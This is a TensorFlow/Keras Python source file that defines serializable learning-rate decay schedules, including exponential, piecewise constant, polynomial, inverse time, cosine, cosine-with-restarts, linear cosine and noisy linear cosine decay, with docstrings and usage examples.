# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Various learning rate decay functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.optimizers.schedules.LearningRateSchedule")
class LearningRateSchedule(object):
"""A serializable learning rate decay schedule.
`LearningRateSchedule`s can be passed in as the learning rate of optimizers in
`tf.keras.optimizers`. They can be serialized and deserialized using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
"""
@abc.abstractmethod
def __call__(self, step):
raise NotImplementedError("Learning rate schedule must override __call__")
@abc.abstractmethod
def get_config(self):
raise NotImplementedError("Learning rate schedule must override get_config")
@classmethod
def from_config(cls, config):
"""Instantiates a `LearningRateSchedule` from its config.
Args:
config: Output of `get_config()`.
Returns:
A `LearningRateSchedule` instance.
"""
return cls(**config)
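# Example (an illustrative sketch, not part of the original module): a
# minimal custom schedule implementing the interface above. The name
# `LinearWarmup` and its parameters are hypothetical.
#
#   class LinearWarmup(LearningRateSchedule):
#
#     def __init__(self, target_lr, warmup_steps):
#       self.target_lr = target_lr
#       self.warmup_steps = warmup_steps
#
#     def __call__(self, step):
#       # Ramp linearly from 0 to `target_lr`, then hold it constant.
#       frac = math_ops.cast(step, "float32") / self.warmup_steps
#       return self.target_lr * math_ops.minimum(frac, 1.0)
#
#     def get_config(self):
#       return {"target_lr": self.target_lr,
#               "warmup_steps": self.warmup_steps}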
@keras_export("keras.optimizers.schedules.ExponentialDecay")
class ExponentialDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses an exponential decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
decay_rate,
staircase=False,
name=None):
"""Applies exponential decay to the learning rate.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies an exponential decay function
to an optimizer step, given a provided initial learning rate.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
return initial_learning_rate * decay_rate ^ (step / decay_steps)
```
If the argument `staircase` is `True`, then `step / decay_steps` is
an integer division and the decayed learning rate follows a
staircase function.
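For example, with `initial_learning_rate=0.1`, `decay_rate=0.96` and
`decay_steps=100000`, the learning rate at step 100000 is
`0.1 * 0.96 = 0.096`.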
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: When fitting a Keras model, decay every 100000 steps with a base
of 0.96:
```python
initial_learning_rate = 0.1
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate,
decay_steps=100000,
decay_rate=0.96,
staircase=True)
model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=lr_schedule),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
The learning rate schedule is also serializable and deserializable using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Must be positive. See the decay computation above.
decay_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The decay rate.
staircase: Boolean. If `True`, decay the learning rate at discrete
intervals.
name: String. Optional name of the operation. Defaults to
'ExponentialDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(ExponentialDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.decay_rate = decay_rate
self.staircase = staircase
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "ExponentialDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
decay_rate = math_ops.cast(self.decay_rate, dtype)
global_step_recomp = math_ops.cast(step, dtype)
p = global_step_recomp / decay_steps
if self.staircase:
p = math_ops.floor(p)
return math_ops.multiply(
initial_learning_rate, math_ops.pow(decay_rate, p), name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"decay_rate": self.decay_rate,
"staircase": self.staircase,
"name": self.name
}
@keras_export("keras.optimizers.schedules.PiecewiseConstantDecay")
class PiecewiseConstantDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a piecewise constant decay schedule."""
def __init__(
self,
boundaries,
values,
name=None):
"""Piecewise constant from boundaries and interval values.
The function returns a 1-arg callable to compute the piecewise constant
when passed the current optimizer step. This can be useful for changing the
learning rate value across different invocations of optimizer functions.
Example: use a learning rate that's 1.0 for the first 100001 steps, 0.5
for the next 10000 steps, and 0.1 for any additional steps.
```python
step = tf.Variable(0, trainable=False)
boundaries = [100000, 110000]
values = [1.0, 0.5, 0.1]
learning_rate_fn = keras.optimizers.schedules.PiecewiseConstantDecay(
boundaries, values)
# Later, whenever we perform an optimization step, we pass in the step.
learning_rate = learning_rate_fn(step)
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
boundaries: A list of `Tensor`s or `int`s or `float`s with strictly
increasing entries, and with all elements having the same type as the
optimizer step.
values: A list of `Tensor`s or `float`s or `int`s that specifies the
values for the intervals defined by `boundaries`. It should have one
more element than `boundaries`, and all elements should have the same
type.
name: A string. Optional name of the operation. Defaults to
'PiecewiseConstant'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as the boundary tensors.
The output of the 1-arg function that takes the `step`
is `values[0]` when `step <= boundaries[0]`,
`values[1]` when `step > boundaries[0]` and `step <= boundaries[1]`, ...,
and `values[-1]` when `step > boundaries[-1]`.
Raises:
ValueError: if the number of elements in the lists do not match.
"""
super(PiecewiseConstantDecay, self).__init__()
if len(boundaries) != len(values) - 1:
raise ValueError(
"The length of boundaries should be 1 less than the length of values")
self.boundaries = boundaries
self.values = values
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "PiecewiseConstant"):
boundaries = ops.convert_n_to_tensor(self.boundaries)
values = ops.convert_n_to_tensor(self.values)
x_recomp = ops.convert_to_tensor(step)
for i, b in enumerate(boundaries):
if b.dtype.base_dtype != x_recomp.dtype.base_dtype:
# We cast the boundaries to have the same type as the step
b = math_ops.cast(b, x_recomp.dtype.base_dtype)
boundaries[i] = b
pred_fn_pairs = []
pred_fn_pairs.append((x_recomp <= boundaries[0], lambda: values[0]))
pred_fn_pairs.append((x_recomp > boundaries[-1], lambda: values[-1]))
for low, high, v in zip(boundaries[:-1], boundaries[1:], values[1:-1]):
# Need to bind v here; can do this with lambda v=v: ...
pred = (x_recomp > low) & (x_recomp <= high)
pred_fn_pairs.append((pred, lambda v=v: v))
# The default isn't needed here because our conditions are mutually
# exclusive and exhaustive, but tf.case requires it.
default = lambda: values[0]
return control_flow_ops.case(pred_fn_pairs, default, exclusive=True)
def get_config(self):
return {
"boundaries": self.boundaries,
"values": self.values,
"name": self.name
}
@keras_export("keras.optimizers.schedules.PolynomialDecay")
class PolynomialDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a polynomial decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
end_learning_rate=0.0001,
power=1.0,
cycle=False,
name=None):
"""Applies a polynomial decay to the learning rate.
It is commonly observed that a monotonically decreasing learning rate, whose
degree of change is carefully chosen, results in a better performing model.
This schedule applies a polynomial decay function to an optimizer step,
given a provided `initial_learning_rate`, to reach an `end_learning_rate`
in the given `decay_steps`.
It requires a `step` value to compute the decayed learning rate. You
can just pass a TensorFlow variable that you increment at each training
step.
The schedule is a 1-arg callable that produces a decayed learning rate
when passed the current optimizer step. This can be useful for changing the
learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
return ((initial_learning_rate - end_learning_rate) *
(1 - step / decay_steps) ^ (power)
) + end_learning_rate
```
If `cycle` is True then a multiple of `decay_steps` is used, the first one
that is bigger than `step`.
```python
def decayed_learning_rate(step):
decay_steps = decay_steps * ceil(step / decay_steps)
return ((initial_learning_rate - end_learning_rate) *
(1 - step / decay_steps) ^ (power)
) + end_learning_rate
```
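For example, with `initial_learning_rate=0.1`, `end_learning_rate=0.01`,
`decay_steps=10000` and `power=0.5`, the learning rate at step 2500 is
`(0.1 - 0.01) * (1 - 0.25) ** 0.5 + 0.01 ≈ 0.088`.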
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: Fit a model while decaying from 0.1 to 0.01 in 10000 steps using
sqrt (i.e. power=0.5):
```python
...
starter_learning_rate = 0.1
end_learning_rate = 0.01
decay_steps = 10000
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
starter_learning_rate,
decay_steps,
end_learning_rate,
power=0.5)
model.compile(optimizer=tf.keras.optimizers.SGD(
learning_rate=learning_rate_fn),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
The learning rate schedule is also serializable and deserializable using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Must be positive. See the decay computation above.
end_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The minimal end learning rate.
power: A scalar `float32` or `float64` `Tensor` or a
Python number. The power of the polynomial. Defaults to linear, 1.0.
cycle: A boolean, whether or not it should cycle beyond decay_steps.
name: String. Optional name of the operation. Defaults to
'PolynomialDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(PolynomialDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.end_learning_rate = end_learning_rate
self.power = power
self.cycle = cycle
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "PolynomialDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
end_learning_rate = math_ops.cast(self.end_learning_rate, dtype)
power = math_ops.cast(self.power, dtype)
global_step_recomp = math_ops.cast(step, dtype)
decay_steps_recomp = math_ops.cast(self.decay_steps, dtype)
if self.cycle:
# Find the first multiple of decay_steps that is bigger than
# global_step. If global_step is zero set the multiplier to 1
multiplier = control_flow_ops.cond(
math_ops.equal(global_step_recomp, 0), lambda: 1.0,
lambda: math_ops.ceil(global_step_recomp / self.decay_steps))
decay_steps_recomp = math_ops.multiply(decay_steps_recomp, multiplier)
else:
# Make sure that the global_step used is not bigger than decay_steps.
global_step_recomp = math_ops.minimum(global_step_recomp,
self.decay_steps)
p = math_ops.divide(global_step_recomp, decay_steps_recomp)
return math_ops.add(
math_ops.multiply(initial_learning_rate - end_learning_rate,
math_ops.pow(1 - p, power)),
end_learning_rate,
name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"end_learning_rate": self.end_learning_rate,
"power": self.power,
"cycle": self.cycle,
"name": self.name
}
@keras_export("keras.optimizers.schedules.InverseTimeDecay")
class InverseTimeDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses an inverse time decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
decay_rate,
staircase=False,
name=None):
"""Applies inverse time decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies the inverse decay function
to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
return initial_learning_rate / (1 + decay_rate * step / decay_steps)
```
or, if `staircase` is `True`, as:
```python
def decayed_learning_rate(step):
return initial_learning_rate / (1 + decay_rate * floor(step / decay_steps))
```
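For example, with `initial_learning_rate=0.1`, `decay_rate=0.5` and
`decay_steps=1.0` (the values used in the example below), the learning
rate at step 1 is `0.1 / (1 + 0.5 * 1) ≈ 0.0667`.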
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: Fit a Keras model when decaying 1/t with a rate of 0.5:
```python
...
initial_learning_rate = 0.1
decay_steps = 1.0
decay_rate = 0.5
learning_rate_fn = keras.optimizers.schedules.InverseTimeDecay(
initial_learning_rate, decay_steps, decay_rate)
model.compile(optimizer=tf.keras.optimizers.SGD(
learning_rate=learning_rate_fn),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: How often to apply decay.
decay_rate: A Python number. The decay rate.
staircase: Whether to apply decay in a discrete staircase, as opposed to
continuous, fashion.
name: String. Optional name of the operation. Defaults to
'InverseTimeDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(InverseTimeDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.decay_rate = decay_rate
self.staircase = staircase
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "InverseTimeDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
decay_rate = math_ops.cast(self.decay_rate, dtype)
global_step_recomp = math_ops.cast(step, dtype)
p = global_step_recomp / decay_steps
if self.staircase:
p = math_ops.floor(p)
const = math_ops.cast(constant_op.constant(1), dtype)
denom = math_ops.add(const, math_ops.multiply(decay_rate, p))
return math_ops.divide(initial_learning_rate, denom, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"decay_rate": self.decay_rate,
"staircase": self.staircase,
"name": self.name
}
@keras_export("keras.experimental.CosineDecay")
class CosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
alpha=0.0,
name=None):
"""Applies cosine decay to the learning rate.
See [Loshchilov & Hutter, ICLR2017], SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a cosine decay function
to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
cosine_decay = 0.5 * (1 + cos(pi * step / decay_steps))
decayed = (1 - alpha) * cosine_decay + alpha
return initial_learning_rate * decayed
```
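For example, with `alpha = 0.0` the learning rate falls to
`0.5 * initial_learning_rate` at `step = decay_steps / 2` and reaches
`alpha * initial_learning_rate` (here zero) at `step = decay_steps`.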
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = tf.keras.experimental.CosineDecay(
initial_learning_rate, decay_steps)
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
alpha: A scalar `float32` or `float64` Tensor or a Python number.
Minimum learning rate value as a fraction of initial_learning_rate.
name: String. Optional name of the operation. Defaults to 'CosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(CosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.alpha = alpha
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "CosineDecay"):
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
completed_fraction = global_step_recomp / decay_steps
cosine_decayed = 0.5 * (1.0 + math_ops.cos(
constant_op.constant(math.pi) * completed_fraction))
decayed = (1 - self.alpha) * cosine_decayed + self.alpha
return math_ops.multiply(initial_learning_rate, decayed)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"alpha": self.alpha,
"name": self.name
}
@keras_export("keras.experimental.CosineDecayRestarts")
class CosineDecayRestarts(LearningRateSchedule):
"""A LearningRateSchedule that uses a cosine decay schedule with restarts."""
def __init__(
self,
initial_learning_rate,
first_decay_steps,
t_mul=2.0,
m_mul=1.0,
alpha=0.0,
name=None):
"""Applies cosine decay with restarts to the learning rate.
See [Loshchilov & Hutter, ICLR2017], SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a cosine decay function with
restarts to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
The learning rate multiplier first decays
from 1 to `alpha` for `first_decay_steps` steps. Then, a warm
restart is performed. Each new warm restart runs for `t_mul` times more
steps and with `m_mul` times smaller initial learning rate.
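For example (values chosen for illustration), with `first_decay_steps=1000`,
`t_mul=2.0` and `m_mul=0.5`, the successive decay periods last 1000, 2000
and 4000 steps, starting at 1.0, 0.5 and 0.25 times the initial learning
rate.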
Example usage:
```python
first_decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.CosineDecayRestarts(
initial_learning_rate,
first_decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
first_decay_steps: A scalar `int32` or `int64` `Tensor` or a Python
number. Number of steps to decay over.
t_mul: A scalar `float32` or `float64` `Tensor` or a Python number.
Used to derive the number of iterations in the i-th period.
m_mul: A scalar `float32` or `float64` `Tensor` or a Python number.
Used to derive the initial learning rate of the i-th period.
alpha: A scalar `float32` or `float64` Tensor or a Python number.
Minimum learning rate value as a fraction of the initial_learning_rate.
name: String. Optional name of the operation. Defaults to 'SGDRDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(CosineDecayRestarts, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.first_decay_steps = first_decay_steps
self._t_mul = t_mul
self._m_mul = m_mul
self.alpha = alpha
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "SGDRDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
first_decay_steps = math_ops.cast(self.first_decay_steps, dtype)
alpha = math_ops.cast(self.alpha, dtype)
t_mul = math_ops.cast(self._t_mul, dtype)
m_mul = math_ops.cast(self._m_mul, dtype)
global_step_recomp = math_ops.cast(step, dtype)
completed_fraction = global_step_recomp / first_decay_steps
def compute_step(completed_fraction, geometric=False):
"""Helper for `cond` operation."""
if geometric:
i_restart = math_ops.floor(
math_ops.log(1.0 - completed_fraction * (1.0 - t_mul)) /
math_ops.log(t_mul))
sum_r = (1.0 - t_mul**i_restart) / (1.0 - t_mul)
completed_fraction = (completed_fraction - sum_r) / t_mul**i_restart
else:
i_restart = math_ops.floor(completed_fraction)
completed_fraction -= i_restart
return i_restart, completed_fraction
i_restart, completed_fraction = control_flow_ops.cond(
math_ops.equal(t_mul, 1.0),
lambda: compute_step(completed_fraction, geometric=False),
lambda: compute_step(completed_fraction, geometric=True))
m_fac = m_mul**i_restart
cosine_decayed = 0.5 * m_fac * (1.0 + math_ops.cos(
constant_op.constant(math.pi) * completed_fraction))
decayed = (1 - alpha) * cosine_decayed + alpha
return math_ops.multiply(initial_learning_rate, decayed, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"first_decay_steps": self.first_decay_steps,
"t_mul": self._t_mul,
"m_mul": self._m_mul,
"alpha": self.alpha,
"name": self.name
}
@keras_export("keras.experimental.LinearCosineDecay")
class LinearCosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a linear cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
num_periods=0.5,
alpha=0.0,
beta=0.001,
name=None):
"""Applies linear cosine decay to the learning rate.
See [Bello et al., ICML2017] Neural Optimizer Search with RL.
https://arxiv.org/abs/1709.07417
For the idea of warm starts here controlled by `num_periods`,
see [Loshchilov & Hutter, ICLR2017] SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
Note that linear cosine decay is more aggressive than cosine decay and
larger initial learning rates can typically be used.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a linear cosine decay
function to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
linear_decay = (decay_steps - step) / decay_steps
cosine_decay = 0.5 * (
1 + cos(pi * 2 * num_periods * step / decay_steps))
decayed = (alpha + linear_decay) * cosine_decay + beta
return initial_learning_rate * decayed
```
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.LinearCosineDecay(
initial_learning_rate, decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
num_periods: Number of periods in the cosine part of the decay.
See computation above.
alpha: See computation above.
beta: See computation above.
name: String. Optional name of the operation. Defaults to
'LinearCosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(LinearCosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.num_periods = num_periods
self.alpha = alpha
self.beta = beta
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "LinearCosineDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
num_periods = math_ops.cast(self.num_periods, dtype)
alpha = math_ops.cast(self.alpha, dtype)
beta = math_ops.cast(self.beta, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
linear_decayed = (decay_steps - global_step_recomp) / decay_steps
completed_fraction = global_step_recomp / decay_steps
fraction = 2.0 * num_periods * completed_fraction
cosine_decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
linear_cosine_decayed = (alpha + linear_decayed) * cosine_decayed + beta
return math_ops.multiply(initial_learning_rate, linear_cosine_decayed,
name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"num_periods": self.num_periods,
"alpha": self.alpha,
"beta": self.beta,
"name": self.name
}
@keras_export("keras.experimental.NoisyLinearCosineDecay")
class NoisyLinearCosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a noisy linear cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
initial_variance=1.0,
variance_decay=0.55,
num_periods=0.5,
alpha=0.0,
beta=0.001,
name=None):
"""Applies noisy linear cosine decay to the learning rate.
See [Bello et al., ICML2017] Neural Optimizer Search with RL.
https://arxiv.org/abs/1709.07417
For the idea of warm starts here controlled by `num_periods`,
see [Loshchilov & Hutter, ICLR2017] SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
Note that linear cosine decay is more aggressive than cosine decay and
larger initial learning rates can typically be used.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a noisy linear cosine decay
function to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule is a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
linear_decay = (decay_steps - step) / decay_steps
cosine_decay = 0.5 * (
1 + cos(pi * 2 * num_periods * step / decay_steps))
decayed = (alpha + linear_decay + eps_t) * cosine_decay + beta
return initial_learning_rate * decayed
```
where `eps_t` is zero-centered Gaussian noise with variance
`initial_variance / (1 + step) ** variance_decay`.
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.NoisyLinearCosineDecay(
initial_learning_rate, decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
initial_variance: initial variance for the noise. See computation above.
variance_decay: decay for the noise's variance. See computation above.
num_periods: Number of periods in the cosine part of the decay.
See computation above.
alpha: See computation above.
beta: See computation above.
name: String. Optional name of the operation. Defaults to
'NoisyLinearCosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(NoisyLinearCosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.initial_variance = initial_variance
self.variance_decay = variance_decay
self.num_periods = num_periods
self.alpha = alpha
self.beta = beta
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "NoisyLinearCosineDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
initial_variance = math_ops.cast(self.initial_variance, dtype)
variance_decay = math_ops.cast(self.variance_decay, dtype)
num_periods = math_ops.cast(self.num_periods, dtype)
alpha = math_ops.cast(self.alpha, dtype)
beta = math_ops.cast(self.beta, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
linear_decayed = (decay_steps - global_step_recomp) / decay_steps
variance = initial_variance / (
math_ops.pow(1.0 + global_step_recomp, variance_decay))
std = math_ops.sqrt(variance)
noisy_linear_decayed = (
linear_decayed + random_ops.random_normal(
linear_decayed.shape, stddev=std))
completed_fraction = global_step_recomp / decay_steps
fraction = 2.0 * num_periods * completed_fraction
cosine_decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
noisy_linear_cosine_decayed = (
(alpha + noisy_linear_decayed) * cosine_decayed + beta)
return math_ops.multiply(
initial_learning_rate, noisy_linear_cosine_decayed, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"initial_variance": self.initial_variance,
"variance_decay": self.variance_decay,
"num_periods": self.num_periods,
"alpha": self.alpha,
"beta": self.beta,
"name": self.name
}
@keras_export("keras.optimizers.schedules.serialize")
def serialize(learning_rate_schedule):
return generic_utils.serialize_keras_object(learning_rate_schedule)
@keras_export("keras.optimizers.schedules.deserialize")
def deserialize(config, custom_objects=None):
return generic_utils.deserialize_keras_object(
config,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name="decay")
---
repo_name: chemelnucfin/tensorflow
path: tensorflow/python/keras/optimizer_v2/learning_rate_schedule.py
language: Python
license: apache-2.0
size: 38679
keyword: ["Gaussian"]
